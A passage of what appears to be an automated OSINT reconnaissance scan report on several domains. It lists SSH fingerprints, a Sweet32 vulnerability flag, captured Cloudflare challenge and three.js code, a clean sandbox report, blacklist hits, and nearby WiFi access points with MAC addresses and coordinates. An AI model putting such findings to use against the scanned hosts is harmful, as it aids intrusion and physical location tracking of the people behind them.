"2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", "vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Tech Overdrive (Net ID: 00:0B:6C:BB:FB:4A) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:14:48 | Vulnerability - CVE High | Yes | Tool - testssl.sh | 0 | 2 | 2 | 0 | None | CVE-2016-2183
https://nvd.nist.gov/vuln/detail/CVE-2016-2183
Score: 7.5
Description: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a "Sweet32" attack. | www.ayhu.xyz |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 5 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f6071cb5443bc')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="IeJGNK1NlgODfmY5lM_CSOUsGpZRJayFri_EMqB7p9E-1683860063-0-AX4CepkLIrJBlYjsLY8SxaK3uwNGfYi_cI78cSgODaKEdDdhGruTJdLNKHipCAas1yRDoJa4jk3w7x3p7ckhzOJuKfeCo8jNUnP70adNIU5dZKa8JiOWBoI9SYK5Q_oq1Eks42yH_Pz5BuZ0QF6ODH2_k4pUMdjxKhGMZCyDKNM52sbeTu0IU1Z9_e1tCtOuH9J1aFZ2tonlXDc4g9zbIux7ExZ49kbKhnzKgiWBhIHUBpMYeWpuSJ_4qCfMlTT-uy5MHKpoVHLVBmCsQ5mELCsRXClDzOjpDkTqbSfAbh8hd0u6E9AsLVFq6mkA8uYgAs4nEqsUUv46GTcwvbzUbkKc1QJ8A2k0LYiOtqEyNozJ7I--u1pFreN-cf0BqBu1bjzjmjk9Ufw9C0rNxE7G3P6fqZnucT3KAI7GF68B4SHiO-kTUnp1udVECKZapa-19gQJJJtF13C6VjJjrQRVkch5xapdVTcSAJFESEO-EAMR9hDp7y8V-5vaHn6SIRKHs78Flbh2RF_P6lv_MAE36XjAyTTiidlaFqpS1ZnkznV7tCrGaYKNvXxibZ3SNtIzHvSSCizS-Sm2WncoqNtWFQZw4MSwC5gehOZvyL9OAj1SA9fWTQ-bfiW7LrZlzCWCJLIZUGG9pJVYCgum_TAJJVGfiljuO91NZvVvNyIgtAepbw2YAdNPwZ3YrRDL_1Un5U1kxz28HuDFJsvpLlTZSNRhPXl4BIx30MOZx9T7SUFWsCGh9uDL2bDPiBh0LSwqszBX0SLNJRo1MhT7IXGB7zy1gfVfFqqb3W0mfVcaymGtm5dqhUdBPRlb4wd_5_BMrKEUeZE1d8HDjjoyYLhvv36SD_5wRCbXxsfCdK2do3aGeM7O6LtZhGR0RuwOPFtRToqLDpM6HnWkxfbvRwTWbQt3gNfo6RJeaXs42GfGC6vMhv6-Zpdazh2C2qr1j5WGxsjVqAAnZQgtB_uAAZyLoW1Egawj2Dc9S-5JYlq2p44Cqz8kfn_HZzhJUPbd4OlAseBQZQfvTsxwQ8yBZFjNQTY6QE_0SDhUH44IwsfVzyg_qg2EOGimekLuWDzCGVBFHthTUHY_Uucg55yA_sEwBbcPwi19lZdxlJ7Akcrfm9Q1xTPYWqd3yg8TDkXwERtBie2ALa_sZMgXe5lFShstzVHZMFcNmZZ_Glu5XNCQGzZM4IALYOXDtzDzNfENL_KkCst225-oNpK1Rzcel6A6qrg383feNMfsfhR4f-t-0gjSgQcGjcMVuJSy33wzj3MyKMSAUAn1H3AU4KXx5l9gYHyPt3K2hXsw8kpaOC5iz5-tYdad463GleEPqMnQXyYze0-F-Kwpfaw0OW4xcwFgpJ7lUIa_Uo9RY1JgFEsKioyqNmIqHv90TnhF2xXyZtqCIT2zmPgDYc3GYmtDVDX3JH3IZ4Ue_9zw8eTUmmNzSLvHF-5-Jv1PvIxzwhsHdZ-9Y8a5xpT_YJ3ApVgxhBxQ9P11Ef3die91V-gWJ9blK7JyrAR97qvn0MVCh6Ipd0gUwoYP19FqAzVItOvoLt6KwAJ_P9BHXzn9V-Qn-K8E2u451f3eK9LuNMBNNeHTIZgwhKeDRKi_7YqSZEtSZBhservvl6AG5D792DbSptVg8teok3yfFJdmbmsVVtq_xMiFDR-JbWee4Xq5OGPEw-qzY3kVcZ3JGSH21pWSbawncJ1pZkYh_Y8uqWXqK_LHYCf1eZ4giUZOc1qNXVqD_66D8diNIgnlP3oGUHrBgTMOfZxq_Uhi6OAhZ7SG3lBy8EfeOsdCdZ3k3gkwd2BrqWGkSsiJCJw71aRSSLzklcMwO0t4rEGUoCt0P2QnnyFhBnAPmmU7bxfnvOSfNl67KcA670pAvXnjK5gtdmpWFLEQTKLiAxus6a1J55sB1jh2yyAgp9gU2TTlKH22JllQWbKYrEsbRrNjjaWTpuGgMUZEhABzykAV0_5Ryf5b1Iu8aB_yUQXLfxLOISB2J16hIkX9JBFDhB-K2iwT5AigiDsDn3kKx7Yn_RfRJoS2pRLWMZrIYAvnVYgYm9y81edopks9rnm7ZmUwgzO-G3g49daHSOyerkiJ0r3J8Okw4DK6PeI9iYnnJ3PuZHAUjE4lk_8MrIhAc4uYX4K1o-9Ke-xbpTbnl7jmdG3Gm-3L29y4tiQBKGjYgOtRk8-ysAEQVxg_UH3seGqQfmukY-uxgmHTqDedEdiiNc4iffnQwUfSPCDaUaRSMt4-JL4MYFn2fdPc4VcXOX79Z268m3iG4CyIoyIieiZJxKq5Fytf17H7DrAwzAK-7_cWORr2s0UVl6ksSgbwFTpGy4N__sJOF51dtXEfVEmWHx_Pzkw3X_pi-v5lATWE8lvwSB-TSiJYfQSJHSYYT6HXfaT1w6X76n4kq-ZrPPxvvJoJiND7W8ZhQjzgNr36p7jhZIQMiMAEzKgTQ4vmitfYqD4w00ar7uYe4W9UaptpqutZe32-rsetHK4f8sKgJ3CeKwcgiEQOluwAYjS5sFZ43pJ1k3hVEeYe7pLW">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '15631',
cRay: '7c5f6071cb5443bc',
cHash: '381065269fdd378',
cUPMDTk: "\/?__cf_chl_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'q4f4pOzDOU+B6AF/zMNZTtfQUbZJdschTcFNDOWKy7up/+mqaf8truQ2KKjt/rj9tsUJvHCPMl5JvfNuCtkhZqw35DYnRx8YzO+NZjtA29VORnsHbyexmRukxXhkj1aUs/dhLsS5lOlcBynQLv3fAojBSMTo2irKEDIydphKjwI16wTgar4SzVlH066rSHCeJ2lW9V/EzSyT6l7asFs9WGN+Z8UjlTPKJ0lqdL3pvuxM1sycw7k1OEGh4TEFk1Zi1Tm1qR0tz33CqvHEhqWe/r3r5anajxc1h5XZ6KT0dxZzvkI9kjdFbs/PTqH3OLzFqntntP1dLIyJxruw2vIIQVb+EG/QQudh3iW9ZP10B65ViMqC73osReO89Glx14C4rnxvY8OJhiGTBOtdj00LRx9JN+pPLlnlA0YFKm2eKJVsXMpv+GW4A4i2NhsMxRv/+0WJcnA98Fw7X4UhvaDcRzqVlcJrpcoGpX4b3ekLBWbuGttHibBiFb8Dx03xS+AEGjoHAFPYd/6bzsrrE8hANuLdxtuQ9vdmh2M9tUxqXUEa48P3yZ8gGXIpNOoU9aBv',
t: 'MTY4Mzg2MDA2My4wMDEwMDA=',
m: 'ku7Iuu8p9xCCueKE3I6e30hCT4pHjE58URs2150Qfj8=',
i1: 'MsbaNnnSVdv9s0jxu/qFPg==',
i2: 'D5L567ziFL3S1185dlxV3g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f6071cb5443bc');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f6071cb5443bc';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 02:50:01 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 120, u'major_os_version': None, u'submit_name': u'https://www.bloknmesh.com/de-de/categories/geschlossene-bauzaune', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"109.237.26.201:443"\n "142.250.189.170:443"\n "142.251.46.232:443"\n "185.199.110.153:443"\n "142.250.191.78:443"\n "142.251.2.157:443"\n "142.250.189.162:443"\n "142.250.189.206:443"\n "142.251.46.227:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.bloknmesh.com"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_be0_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "IsoScope_be0_IESQMMUTEX_0_331"\n "IsoScope_be0_ConnHashTable<3040>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3040"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_be0_IESQMMUTEX_0_303"\n "IsoScope_be0_IE_EarlyTabStart_0xdc0_Mutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_be0_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "gb_1_.svg" as clean (type is "SVG Scalable Vector Graphics image")\n Antivirus vendors marked dropped file "TarF14F.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"CabF14E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabF1B0.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabF18F.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabF23E.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"\n "CabF13C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62932 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"menu_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "country-select-arrow_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "nl_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "at_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "logo_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "angle-left-small-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "direct-green_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "linkedin_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "facebook_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "logo-mobile_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "search-white_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "hire-green_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "installation-green_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "youtube_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "be_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "de_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "twitter_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "search-toggle-close_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "country-toggle-close_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://www.bloknmesh.com/de-de/categories/geschlossene-bauzaune"\n Pattern match: "https://www.bloknmesh.com"\n Pattern match: "www.bloknmesh.com"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-6', u'name': u'Contacts Random Domain Names', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 7, u'description': u'"www.bloknmesh.com" seems to be random'}], u'threat_level': 0, u'size': None, u'job_id': u'63eb580a656d4508501f7ddd', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [{u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'suspicious_identifiers': [], u'attck_id': u'T1105', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Ingress Tool Transfer', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': None, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'suspicious_identifiers': [], u'attck_id': u'T1071', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'Application Layer Protocol', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}, {u'parent': {u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'technique': u'Application Layer Protocol', u'attck_id': u'T1071'}, u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'suspicious_identifiers': [], u'attck_id': u'T1071.004', u'malicious_identifiers': [], u'malicious_identifiers_count': 0, u'technique': u'DNS', u'informative_identifiers': [], u'tactic': u'Command and Control', u'informative_identifiers_count': 1, u'suspicious_identifiers_count': 0}], u'certificates': [], u'hosts': [u'109.237.26.201', u'142.250.189.170', u'142.251.46.232', u'185.199.110.153', u'142.250.191.78', u'142.251.2.157', u'142.250.189.162', u'142.250.189.206', u'142.251.46.227'], u'sha256': u'ffc86eb014a73c210623dbd4f36139a11c64b837621251d40584904dd7208526', u'sha512': u'1c3d667eabb07aa2a138edbfa8d3804ddede4abce94c0a69545d2046db978c501505db13ae264fef10d8c1b02ba750ecff6d74d3be180c96b659ba1f3db1ce6d', u'image_file_characteristics': [], u'submissions': [{u'url': u'https://www.bloknmesh.com/de-de/categories/geschlossene-bauzaune', u'submission_id': u'63eb580a656d4508501f7dde', u'created_at': u'2023-02-14T09:44:42+00:00', u'filename': None}], u'analysis_start_time': u'2023-02-14T09:44:43+00:00', u'tags': [], u'imphash': u'Unknown', u'total_network_connections': 9, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 8, u'image_base': None, u'error_origin': None, u'ssdeep': u'Unknown', u'entrypoint_section': None, u'md5': u'05fe3e8314ad9f8079b7f8e333a310e7', u'network_mode': u'default', u'processes': [], u'sha1': u'9d87d6dc6afb474f596750e0f7fcfbc195ed29dd', u'url_analysis': True, u'type': None, u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Windows 7 64 bit', u'verdict': u'no specific threat', u'minor_os_version': None, u'domains': [u'www.bloknmesh.com'], u'extracted_files': [], u'type_short': []}] | 185.199.110.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 2 | 0 | None | x-served-by: cache-ewr18140-EWR | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 03:01:24 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.226): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Kaesler (Net ID: 00:14:5C:86:BC:3E) | 50.8897, 6.0563 |
| 2023-05-12 03:01:38 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.161): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:54:13 | Web Content | No | Web Spider | 0 | 0 | 3 | 0 | None | !function(e){var t={};function n(i){if(t[i])return t[i].exports;var r=t[i]={i:i,l:!1,exports:{}};return e[i].call(r.exports,r,r.exports,n),r.l=!0,r.exports}n.m=e,n.c=t,n.d=function(e,t,i){n.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:i})},n.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},n.t=function(e,t){if(1&t&&(e=n(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var i=Object.create(null);if(n.r(i),Object.defineProperty(i,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)n.d(i,r,function(t){return e[t]}.bind(null,r));return i},n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,"a",t),t},n.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},n.p="",n(n.s=9)}([function(e,t,n){"use strict";n.d(t,"a",(function(){return s}));var i=n(4),r=n(7),a=new s,o=new r.a;function s(e,t,n){this.x=e||0,this.y=t||0,this.z=n||0}Object.assign(s.prototype,{isVector3:!0,set:function(e,t,n){return this.x=e,this.y=t,this.z=n,this},setScalar:function(e){return this.x=e,this.y=e,this.z=e,this},setX:function(e){return this.x=e,this},setY:function(e){return this.y=e,this},setZ:function(e){return this.z=e,this},setComponent:function(e,t){switch(e){case 0:this.x=t;break;case 1:this.y=t;break;case 2:this.z=t;break;default:throw new Error("index is out of range: "+e)}return this},getComponent:function(e){switch(e){case 0:return this.x;case 1:return this.y;case 2:return this.z;default:throw new Error("index is out of range: "+e)}},clone:function(){return new this.constructor(this.x,this.y,this.z)},copy:function(e){return this.x=e.x,this.y=e.y,this.z=e.z,this},add:function(e,t){return void 0!==t?(console.warn("THREE.Vector3: .add() now only accepts one argument. Use .addVectors( a, b ) instead."),this.addVectors(e,t)):(this.x+=e.x,this.y+=e.y,this.z+=e.z,this)},addScalar:function(e){return this.x+=e,this.y+=e,this.z+=e,this},addVectors:function(e,t){return this.x=e.x+t.x,this.y=e.y+t.y,this.z=e.z+t.z,this},addScaledVector:function(e,t){return this.x+=e.x*t,this.y+=e.y*t,this.z+=e.z*t,this},sub:function(e,t){return void 0!==t?(console.warn("THREE.Vector3: .sub() now only accepts one argument. Use .subVectors( a, b ) instead."),this.subVectors(e,t)):(this.x-=e.x,this.y-=e.y,this.z-=e.z,this)},subScalar:function(e){return this.x-=e,this.y-=e,this.z-=e,this},subVectors:function(e,t){return this.x=e.x-t.x,this.y=e.y-t.y,this.z=e.z-t.z,this},multiply:function(e,t){return void 0!==t?(console.warn("THREE.Vector3: .multiply() now only accepts one argument. Use .multiplyVectors( a, b ) instead."),this.multiplyVectors(e,t)):(this.x*=e.x,this.y*=e.y,this.z*=e.z,this)},multiplyScalar:function(e){return this.x*=e,this.y*=e,this.z*=e,this},multiplyVectors:function(e,t){return this.x=e.x*t.x,this.y=e.y*t.y,this.z=e.z*t.z,this},applyEuler:function(e){return e&&e.isEuler||console.error("THREE.Vector3: .applyEuler() now expects an Euler rotation rather than a Vector3 and order."),this.applyQuaternion(o.setFromEuler(e))},applyAxisAngle:function(e,t){return this.applyQuaternion(o.setFromAxisAngle(e,t))},applyMatrix3:function(e){var t=this.x,n=this.y,i=this.z,r=e.elements;return this.x=r[0]*t+r[3]*n+r[6]*i,this.y=r[1]*t+r[4]*n+r[7]*i,this.z=r[2]*t+r[5]*n+r[8]*i,this},applyNormalMatrix:function(e){return this.applyMatrix3(e).normalize()},applyMatrix4:function(e){var t=this.x,n=this.y,i=this.z,r=e.elements,a=1/(r[3]*t+r[7]*n+r[11]*i+r[15]);return this.x=(r[0]*t+r[4]*n+r[8]*i+r[12])*a,this.y=(r[1]*t+r[5]*n+r[9]*i+r[13])*a,this.z=(r[2]*t+r[6]*n+r[10]*i+r[14])*a,this},applyQuaternion:function(e){var t=this.x,n=this.y,i=this.z,r=e.x,a=e.y,o=e.z,s=e.w,l=s*t+a*i-o*n,c=s*n+o*t-r*i,u=s*i+r*n-a*t,h=-r*t-a*n-o*i;return this.x=l*s+h*-r+c*-o-u*-a,this.y=c*s+h*-a+u*-r-l*-o,this.z=u*s+h*-o+l*-a-c*-r,this},project:function(e){return this.applyMatrix4(e.matrixWorldInverse).applyMatrix4(e.projectionMatrix)},unproject:function(e){return this.applyMatrix4(e.projectionMatrixInverse).applyMatrix4(e.matrixWorld)},transformDirection:function(e){var t=this.x,n=this.y,i=this.z,r=e.elements;return this.x=r[0]*t+r[4]*n+r[8]*i,this.y=r[1]*t+r[5]*n+r[9]*i,this.z=r[2]*t+r[6]*n+r[10]*i,this.normalize()},divide:function(e){return this.x/=e.x,this.y/=e.y,this.z/=e.z,this},divideScalar:function(e){return this.multiplyScalar(1/e)},min:function(e){return this.x=Math.min(this.x,e.x),this.y=Math.min(this.y,e.y),this.z=Math.min(this.z,e.z),this},max:function(e){return this.x=Math.max(this.x,e.x),this.y=Math.max(this.y,e.y),this.z=Math.max(this.z,e.z),this},clamp:function(e,t){return this.x=Math.max(e.x,Math.min(t.x,this.x)),this.y=Math.max(e.y,Math.min(t.y,this.y)),this.z=Math.max(e.z,Math.min(t.z,this.z)),this},clampScalar:function(e,t){return this.x=Math.max(e,Math.min(t,this.x)),this.y=Math.max(e,Math.min(t,this.y)),this.z=Math.max(e,Math.min(t,this.z)),this},clampLength:function(e,t){var n=this.length();return this.divideScalar(n||1).multiplyScalar(Math.max(e,Math.min(t,n)))},floor:function(){return this.x=Math.floor(this.x),this.y=Math.floor(this.y),this.z=Math.floor(this.z),this},ceil:function(){return this.x=Math.ceil(this.x),this.y=Math.ceil(this.y),this.z=Math.ceil(this.z),this},round:function(){return this.x=Math.round(this.x),this.y=Math.round(this.y),this.z=Math.round(this.z),this},roundToZero:function(){return this.x=this.x<0?Math.ceil(this.x):Math.floor(this.x),this.y=this.y<0?Math.ceil(this.y):Math.floor(this.y),this.z=this.z<0?Math.ceil(this.z):Math.floor(this.z),this},negate:function(){return this.x=-this.x,this.y=-this.y,this.z=-this.z,this},dot:function(e){return this.x*e.x+this.y*e.y+this.z*e.z},lengthSq:function(){return this.x*this.x+this.y*this.y+this.z*this.z},length:function(){return 